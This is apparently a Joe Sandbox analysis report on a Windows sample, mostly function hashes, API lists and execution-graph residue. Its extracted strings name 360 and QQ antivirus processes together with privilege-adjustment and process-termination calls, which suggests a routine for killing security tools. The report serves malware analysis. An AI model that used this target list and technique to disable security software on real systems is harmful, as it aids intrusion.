• String ID: CreateThreadpoolWait
• API String ID: 1788304134-540757568
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: CreateErrorLastThreadpoolWork
• String ID: CreateThreadpoolWork
• API String ID: 1144500323-245081381
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: CreateErrorLastThreadpoolTimer
• String ID: CreateThreadpoolTimer
• API String ID: 1405359104-3425787056
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: CreateErrorLastThreadpool
• String ID: CreateThreadpoolIo
• API String ID: 480746585-1136547880
Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0

Execution Graph

Execution Coverage: 1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.4%
Total number of Nodes: 945
Total number of Limit Nodes: 1
execution_graph: text residue of the interactive execution graph (node id, address and edge listing; 945 nodes), not reproduced here. The recoverable content is the set of symbols named on the nodes, which are largely C runtime internals (for example _invalid_parameter_noinfo, __scrt_acquire_startup_lock, try_get_function, __free_lconv_num, _set_errno_from_matherr, Concurrency::details::SchedulerProxy::DeleteThis) together with the following Windows API calls: HeapFree, HeapReAlloc, FindFirstFileExW, GetModuleFileNameW, GetModuleHandleW, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStartupInfoW, GetStdHandle, GetFileType, GetConsoleMode, GetConsoleCP, CreateFileW, CloseHandle, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, IsDebuggerPresent, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, RtlUnwindEx, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, GetOEMCP, GetACP, GetCurrentProcess, TerminateProcess, ExitProcess.
_set_errno_from_matherr HeapFree 7401->7402 7404 140adfcf2fa 7402->7404 7403 140adfcf306 try_get_function wprintf 7403->7404 7405 140adfc5df0 wprintf HeapFree 7403->7405 7404->7361 7405->7404 7407 140adfce099 7406->7407 7409 140adfce0a6 7406->7409 7408 140adfc5e60 _set_errno_from_matherr HeapFree 7407->7408 7410 140adfcb6a7 7408->7410 7409->7410 7411 140adfc5e60 _set_errno_from_matherr HeapFree 7409->7411 7410->7369 7410->7373 7412 140adfce0dd 7411->7412 7413 140adfc5d40 _invalid_parameter_noinfo HeapFree 7412->7413 7413->7410 7415 140adfc33d8 wprintf 9 API calls 7414->7415 7421 140adfcad30 memcpy_s wprintf 7415->7421 7416 140adfd0ba0 _handle_error 4 API calls 7418 140adfcb0c1 7416->7418 7418->7394 7420 140adfcc03c 5 API calls wprintf 7420->7421 7421->7420 7422 140adfcb054 try_get_function 7421->7422 7454 140adfca840 7421->7454 7459 140adfca1cc 7421->7459 7422->7416 7426 140adfcb2a4 try_get_function wprintf 7423->7426 7424 140adfd0ba0 _handle_error 4 API calls 7425 140adfcb38d 7424->7425 7425->7394 7426->7424 7430 140adfcb3c4 wprintf 7427->7430 7428 140adfd0ba0 _handle_error 4 API calls 7429 140adfcb4fc 7428->7429 7429->7394 7431 140adfca1cc wprintf WideCharToMultiByte 7430->7431 7432 140adfcb4e1 try_get_function 7430->7432 7431->7430 7432->7428 7436 140adfcb1a0 try_get_function wprintf 7433->7436 7434 140adfd0ba0 _handle_error 4 API calls 7435 140adfcb272 7434->7435 7435->7394 7436->7434 7438 140adfc796c _invalid_parameter_noinfo HeapFree 7437->7438 7439 140adfc5e01 7438->7439 7440 140adfc796c _invalid_parameter_noinfo HeapFree 7439->7440 7441 140adfc5e1a __free_lconv_num 7440->7441 7441->7382 7443 140adfcbb95 7442->7443 7444 140adfcbbaa 7442->7444 7445 140adfc5e40 wprintf HeapFree 7443->7445 7446 140adfc5e40 wprintf HeapFree 7444->7446 7451 140adfcbba2 7444->7451 7447 140adfcbb9a 7445->7447 7448 140adfcbbe5 7446->7448 7449 140adfc5e60 _set_errno_from_matherr HeapFree 7447->7449 7450 140adfc5e60 _set_errno_from_matherr HeapFree 7448->7450 7449->7451 7452 
140adfcbbed 7450->7452 7451->7401 7451->7403 7453 140adfc5d40 _invalid_parameter_noinfo HeapFree 7452->7453 7453->7451 7455 140adfc77f0 wprintf 9 API calls 7454->7455 7456 140adfca849 7455->7456 7457 140adfc7a98 wprintf 9 API calls 7456->7457 7458 140adfca862 7457->7458 7458->7421 7460 140adfca1e8 WideCharToMultiByte 7459->7460 7462 140adfd2038 7460->7462 7464 140adfcf008 7463->7464 7465 140adfcf03b 7464->7465 7466 140adfcf032 7464->7466 7468 140adfc5e60 _set_errno_from_matherr HeapFree 7465->7468 7470 140adfcf104 7466->7470 7469 140adfcf037 7468->7469 7469->7331 7471 140adfcbb8c wprintf HeapFree 7470->7471 7474 140adfcf118 7471->7474 7472 140adfcf11e try_get_function 7484 140adfcbad0 7472->7484 7474->7472 7476 140adfcbb8c wprintf HeapFree 7474->7476 7483 140adfcf15b 7474->7483 7478 140adfcf14e 7476->7478 7477 140adfcbb8c wprintf HeapFree 7479 140adfcf167 CloseHandle 7477->7479 7481 140adfcbb8c wprintf HeapFree 7478->7481 7479->7472 7480 140adfc5df0 wprintf HeapFree 7482 140adfcf1af 7480->7482 7481->7483 7482->7469 7483->7472 7483->7477 7485 140adfcbb5e 7484->7485 7487 140adfcbaec 7484->7487 7486 140adfc5e60 _set_errno_from_matherr HeapFree 7485->7486 7488 140adfcbb63 7486->7488 7487->7485 7492 140adfcbb1f 7487->7492 7489 140adfc5e40 wprintf HeapFree 7488->7489 7490 140adfcbb50 7489->7490 7490->7480 7490->7482 7491 140adfcbb48 SetStdHandle 7491->7490 7492->7490 7492->7491 7493 140adfc54c8 7496 140adfc5294 7493->7496 7503 140adfc525c 7496->7503 7504 140adfc526c 7503->7504 7505 140adfc5271 7503->7505 7506 140adfc5218 HeapFree 7504->7506 7507 140adfc5278 7505->7507 7506->7505 7508 140adfc528d 7507->7508 7509 140adfc5288 7507->7509 7511 140adfc5218 7508->7511 7510 140adfc5218 HeapFree 7509->7510 7510->7508 7512 140adfc521d 7511->7512 7513 140adfc524e 7511->7513 7514 140adfc5246 7512->7514 7515 140adfc5ef8 __free_lconv_num HeapFree 7512->7515 7516 140adfc5ef8 __free_lconv_num HeapFree 7514->7516 7515->7512 7516->7513 8040 140adfca148 GetCommandLineA GetCommandLineW 6940 
140adfc0286 6941 140adfc02ef CreateToolhelp32Snapshot 6940->6941 6942 140adfc108a 6941->6942 6943 140adfc1023 __scrt_fastfail 6941->6943 6944 140adfc103d Process32First 6943->6944 6946 140adfc104c 6944->6946 6945 140adfc1081 CloseHandle 6945->6942 6946->6945 6947 140adfc109d CloseHandle 6946->6947 6948 140adfc1073 Process32Next 6946->6948 6947->6942 6948->6946 7775 140adfca400 GetProcessHeap 7595 140adfcee80 7596 140adfcee88 7595->7596 7597 140adfcee9d 7596->7597 7598 140adfceeb6 7596->7598 7599 140adfc5e60 _set_errno_from_matherr HeapFree 7597->7599 7602 140adfc33d8 wprintf 9 API calls 7598->7602 7603 140adfceead 7598->7603 7600 140adfceea2 7599->7600 7601 140adfc5d40 _invalid_parameter_noinfo HeapFree 7600->7601 7601->7603 7602->7603 8041 140adfd1143 __scrt_dllmain_exception_filter

Control-flow Graph

Memory Dump Source
• Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d18c40656cae29c548f7271634e43ccf2789769c4f329273b938c7959e451a53
• Instruction ID: 06a783a180ab62c277cd57d378a31a60df45147ecf15f47377697f87be38cea8
• Opcode Fuzzy Hash: d18c40656cae29c548f7271634e43ccf2789769c4f329273b938c7959e451a53
• Instruction Fuzzy Hash: 3311E7322287C847EF67972399143DBB7A3AF8C790F5882219759436E6DA3CC826D700

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
Similarity
• API ID: Processwprintf$AddressAdjustErrorHandleLastModuleOpenPrivilegeProcSleepTerminate
• String ID: 360LogCenter.exe$360Safe.exe$360Tray.exe$360huabao.exe$360rp.exe$360rps.exe$360sd.exe$360sdupd.exe$360speedld.exe$360tray.exe$Calc.exe$DSMain.exe$DumpUper.exe$EXCEL.exe$FireFox.exe$LiveUpdate360.exe$NSIS.exe$QMDL.exe$QQPCRTP.exe$QQPCTray.exe$RtlAdjustPrivilege$ZhuDongFangYu.exe$ntdll$xdict.exe
• API String ID: 5669555-1361469849
• Opcode ID: 24d51f0a703d8914dcecad46e80c6b974424f7a363abdc667e241b1ccd0e6945
• Instruction ID: 144e8786a4b836ed3e5618c3f3ec10ad9bbd8b10f3494fe4011c7b990bea52e8
• Opcode Fuzzy Hash: 24d51f0a703d8914dcecad46e80c6b974424f7a363abdc667e241b1ccd0e6945
• Instruction Fuzzy Hash: 4551ED3462074843EE56B772D8653DB3253BF98345FA40625A64A871FBDE39CD37A380

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
Similarity
• API ID: ErrorFileLastWrite$Console
• String ID: MZER
• API String ID: 786612050-2424380061
• Opcode ID: 5fc4feed90efd471fb5ce59cf83c65739393e50eb3ef152f50aa3b5421ebb0d5
• Instruction ID: c74ead08e62e1a9c33215e75819414dc40a9706ca957abf03945b31a54bdfef6
• Opcode Fuzzy Hash: 5fc4feed90efd471fb5ce59cf83c65739393e50eb3ef152f50aa3b5421ebb0d5
• Instruction Fuzzy Hash: A8E1EF76724B889AE702CF76D4442DE77B3FB49788F640116CB8A47BA9DA34C16BD300

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 0ad423fde92f3f6014d0d5a5c5ca5ddf7528281e5dff3197ed98a148e2b121e3
• Instruction ID: 0cade24ae5590496a30be0b4c00ed4af76a526760aa7f1831f94413360d2efe4
• Opcode Fuzzy Hash: 0ad423fde92f3f6014d0d5a5c5ca5ddf7528281e5dff3197ed98a148e2b121e3
• Instruction Fuzzy Hash: 59313D36214B8486DB61CF26E8443DE73A7FB88758F640125EB9D43BA9DF38C556CB40

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: gfffffff
• API String ID: 3215553584-1523873471
• Opcode ID: caa4a8a41497ffe82b5b0fa0bcb66fb6e589835bb099227987a6e57e44845178
• Instruction ID: 485a7e7d6711d32f3d8944ce97608632e9dab7a2165fab70ab5cd241bbb13a72
• Opcode Fuzzy Hash: caa4a8a41497ffe82b5b0fa0bcb66fb6e589835bb099227987a6e57e44845178
• Instruction Fuzzy Hash: CD9124737157C987EB16CB26E4003EE77A7AB58BC4F258022CB59473A5EA39C517E301
Memory Dump Source
• Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eedf6195b07e75503f7ef64eaadaade89bfce7268fedf9e5281d300d5d643694
• Instruction ID: 34c72ff10ec4b96bca838921b36f9e884905769864e9bd736e421a716fda2a1c
• Opcode Fuzzy Hash: eedf6195b07e75503f7ef64eaadaade89bfce7268fedf9e5281d300d5d643694
• Instruction Fuzzy Hash: EE51D1327247949AF7218B77A9003DF7BA7BB49BD8F244214AF9847BA5CB38C552D700
Memory Dump Source
• Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f5203cd92e734575f79167aed4563d6f1df4752d5705fd897fb0d44aadde9f5b
• Instruction ID: fc8b68289c36e3eeff4c960dcbe6f4b96bb4bacc7425a59055c6b5233f733184
• Opcode Fuzzy Hash: f5203cd92e734575f79167aed4563d6f1df4752d5705fd897fb0d44aadde9f5b
• Instruction Fuzzy Hash: 3AF062717153948BDBA58F29A80275A77E3FB0C384F908429E6C983B64D23C8061AF44
Memory Dump Source
• Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 72c30af276ceb9d04587f3c8f33b1f96cfcd9a34781d576eee18766bdf06db1e
• Instruction ID: 797370bfb6938aaf9b79aa84a5a9fb9390bb6ceaa0e0813607f69cf711b3b758
• Opcode Fuzzy Hash: 72c30af276ceb9d04587f3c8f33b1f96cfcd9a34781d576eee18766bdf06db1e
• Instruction Fuzzy Hash: D0D012AB55EBC037F1D342290E663992FC3BF56B6CF2C834D8BB0071D2523208079245

Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_fastfail__scrt_release_startup_lock$__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_uninitialize_crt
                                                                                                              • String ID:
                                                                                                              • API String ID: 1988982384-0
                                                                                                              • Opcode ID: 0b6473d37e5de2f6e6d1741f9288cea7edc3785064012b50b1e1524d92f4a22c
                                                                                                              • Instruction ID: 7f2c1d08241201adfb7c4973d39bb8dd0235bcf2550be065a5b08e27a6f87a02
                                                                                                              • Opcode Fuzzy Hash: 0b6473d37e5de2f6e6d1741f9288cea7edc3785064012b50b1e1524d92f4a22c
                                                                                                              • Instruction Fuzzy Hash: 8291BD30A2074987FF52AB6794403DB3293AF8E784F748115AB49477B6DA38CDB3A700

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                              • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                              • API String ID: 3215553584-2617248754
                                                                                                              • Opcode ID: ea11b76dc15e85ae5e90986785aa746ab39b77cc28c4fb9aa00a5116ba60465d
                                                                                                              • Instruction ID: b4a3c7ee2944b92e831b883943a62f391fd93177c27c0d9db1e23a63a1600681
                                                                                                              • Opcode Fuzzy Hash: ea11b76dc15e85ae5e90986785aa746ab39b77cc28c4fb9aa00a5116ba60465d
                                                                                                              • Instruction Fuzzy Hash: A9419E36710B548AE701CF26E8503CE33E7FB08788F644125EF9847BA8EA38C526D340

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Processwprintf$ErrorLastOpenTerminate
                                                                                                              • String ID: ERROR:error no is :%d$openprocess failed...
                                                                                                              • API String ID: 1343626970-3419103911
                                                                                                              • Opcode ID: fb04a702b352934bfb24a0038739b3ecd274cc920e2fc26e3ad7404113707b54
                                                                                                              • Instruction ID: e084710364dd71c0cb66ae3032b6907e0dcf54b6dc4e00167b79ca2624c7402a
                                                                                                              • Opcode Fuzzy Hash: fb04a702b352934bfb24a0038739b3ecd274cc920e2fc26e3ad7404113707b54
                                                                                                              • Instruction Fuzzy Hash: FEF01231711B0443FB57972398443D731936F9C709FB441248A4A832B4EE3489B7B240

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                              • String ID: CONOUT$
                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                              • Opcode ID: 913781285adf38d8b4229c6d5fc6a6834cdbe5f6ec22c189a15ee890de81af83
                                                                                                              • Instruction ID: f41df36ce56894eae6fbe6044e64e41d9f6fa8a455f9b52abad17a5ddd81c7f3
                                                                                                              • Opcode Fuzzy Hash: 913781285adf38d8b4229c6d5fc6a6834cdbe5f6ec22c189a15ee890de81af83
                                                                                                              • Instruction Fuzzy Hash: 36118131210B4483E7518B53E85435AB2A3FB8CBE8F644214EB99877B8CB38C5569740

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                              • Opcode ID: 16d129b887caba687a4f49f846cfe76f8213c1e964bf524bc6523eeb77cca99a
                                                                                                              • Instruction ID: 2adb31ba1d3a99ba6a320f15d537632a8910ad8a2c1773db0de04bfbafcc5e77
                                                                                                              • Opcode Fuzzy Hash: 16d129b887caba687a4f49f846cfe76f8213c1e964bf524bc6523eeb77cca99a
                                                                                                              • Instruction Fuzzy Hash: 57F0547172174493EB469F12D48439A3363AF4C758F5450159B8747674CF38C49AD740

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                              • String ID:
                                                                                                              • API String ID: 2210144848-0
                                                                                                              • Opcode ID: 0aa645aeeb634e79f4747d2c1e5fe33c76d88011438f1f6af14576989577eca1
                                                                                                              • Instruction ID: e0b4b6b4ee3f6a0fbcccb929156e489834919fed141868cb47d8868d321161c8
                                                                                                              • Opcode Fuzzy Hash: 0aa645aeeb634e79f4747d2c1e5fe33c76d88011438f1f6af14576989577eca1
                                                                                                              • Instruction Fuzzy Hash: 7381BC3A6207188BF7629B6794883EE3663FF4CB88F644115DF0A137E5DA348467A710

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _set_statfp
                                                                                                              • String ID:
                                                                                                              • API String ID: 1156100317-0
                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                              • Instruction ID: 6c807da701675cfe1835e1e6f58747cb5b7cd97ce68a1a2e654248f864b6c262
                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                              • Instruction Fuzzy Hash: 1D11A372A51B4607F666116BE4563EB34436F5C3BEF350724AFE60B6FE8A7488837104

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                              • String ID: $*
                                                                                                              • API String ID: 3215553584-3982473090
                                                                                                              • Opcode ID: a6d38b0082aa0a66bdf3457a030c53fd1f64bdea90d598c7255dcf565db40810
                                                                                                              • Instruction ID: 7f97536e1277082bef201b86e5aaf8f8118a348225da5a3674e4afee1c3f4b9d
                                                                                                              • Opcode Fuzzy Hash: a6d38b0082aa0a66bdf3457a030c53fd1f64bdea90d598c7255dcf565db40810
                                                                                                              • Instruction Fuzzy Hash: 5F61637322434887E76A8F2690553AF3BE3EB0DB98F341115CF46476E9C734C466A741

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                              • String ID: -$e+000$gfff
                                                                                                              • API String ID: 3215553584-2620144452
                                                                                                              • Opcode ID: b36fcc511ed639febc8617f931b73cbb3dfed337ad52bd8f99b52793d8ed6159
                                                                                                              • Instruction ID: 44a48c9981b1e05bbe9e2d157db87febc40c9d57d627afebfbade9ad2f48ab74
                                                                                                              • Opcode Fuzzy Hash: b36fcc511ed639febc8617f931b73cbb3dfed337ad52bd8f99b52793d8ed6159
                                                                                                              • Instruction Fuzzy Hash: 285108727247C887E7668F3AD8413CA7B93EB84B90F5C9221CB944BBE5CA39C456D700

                                                                                                              Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
Similarity
• API ID: Valuetry_get_function
• String ID: ERROR:error no is :%d$FlsSetValue
• API String ID: 738293619-907136408
• Opcode ID: 260fe3b1804f72f4a10bf823fe0ff6abdffd4cc23a2d2d7020f7e243c0506e86
• Instruction ID: bf77cd5551fa96b0456b85a9dc6e4fa629855707be503abb46cd32f8a959f6be
• Opcode Fuzzy Hash: 260fe3b1804f72f4a10bf823fe0ff6abdffd4cc23a2d2d7020f7e243c0506e86
• Instruction Fuzzy Hash: 5DE0397161574493FB0A4B52E8402DA3273AF8C788FA88022AF96073B4CE38C896A251
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 7193055222a06152960c3edf59cb11cd12c9819c05e9034f4b9399f865831105
• Instruction ID: f0601a2d4bd3a10198b0e194f475aa79e0c6681d0dd6374e601bf1cbd9245908
• Opcode Fuzzy Hash: 7193055222a06152960c3edf59cb11cd12c9819c05e9034f4b9399f865831105
• Instruction Fuzzy Hash: 1241A432628B8486DB218F26E4443EA7767FB88794F544021EF8D877A8DB38C556D740
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
Similarity
• API ID: Stringtry_get_function
• String ID: LCMapStringEx
• API String ID: 2588686239-3893581201
• Opcode ID: 3616bccf63ab0673b6ddcbb85814c80a8ea7b221e16f54645427d343d5099b20
• Instruction ID: 6d85740570a1b0861e119ef1c74d938457b903bb4ea606f68700e576a9e15717
• Opcode Fuzzy Hash: 3616bccf63ab0673b6ddcbb85814c80a8ea7b221e16f54645427d343d5099b20
• Instruction Fuzzy Hash: C9113836208BC086D761CB06B44029AB7A6FBCDB94F64412AEFCD87B29CF38C4519B40
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpintry_get_function
• String ID: InitializeCriticalSectionEx
• API String ID: 539475747-3084827643
• Opcode ID: 7ab7e1f7720f2558b91f0bfd0b36e97e7c4448d79672db0312535455e5b378ac
• Instruction ID: 02179cc578c218ad208edff0fe8ba511794c2c37b157d05e22a9bac0752ce5c1
• Opcode Fuzzy Hash: 7ab7e1f7720f2558b91f0bfd0b36e97e7c4448d79672db0312535455e5b378ac
• Instruction Fuzzy Hash: 5EF03A3161578493FA169B43A4402DA7263BF8CB88FA88026AF9917B75CE39C496A741
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
Similarity
• API ID: Valuetry_get_function
• String ID: FlsSetValue
• API String ID: 738293619-3750699315
• Opcode ID: 4f7bd1d21e3783e6278deb9379984bbb26a0530b157d76af6cf8199b30a7d814
• Instruction ID: 2e828d9efaabab77e900a40bcf59446c74e1cd2f8fee8cde6f8e377ca678c6dc
• Opcode Fuzzy Hash: 4f7bd1d21e3783e6278deb9379984bbb26a0530b157d76af6cf8199b30a7d814
• Instruction Fuzzy Hash: 15E0397521078493EA575B52A4002DE7323FF8C788FA890269B99076B8CE38C897E290
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_140adfc0000_lsass.jbxd
Similarity
• API ID: DownlevelLocaleName__crttry_get_function
• String ID: LocaleNameToLCID
• API String ID: 404522899-2050040251
• Opcode ID: 7eb4b64a6bb929c538f746eb82f6ea186045184b5677d91810cc171b55c20c29
• Instruction ID: 200ea365b4004005825e1b883a0cc46f56db300498a89813c9ca0321064b7313
• Opcode Fuzzy Hash: 7eb4b64a6bb929c538f746eb82f6ea186045184b5677d91810cc171b55c20c29
• Instruction Fuzzy Hash: CDE0E53532474893FA079B57A4413EB3293AF8C744FB85021AB550B6B5CE38C957A751

Execution Graph

Execution Coverage: 3.4%
Dynamic/Decrypted Code Coverage: 28.3%
Signature Coverage: 21.8%
Total number of Nodes: 619
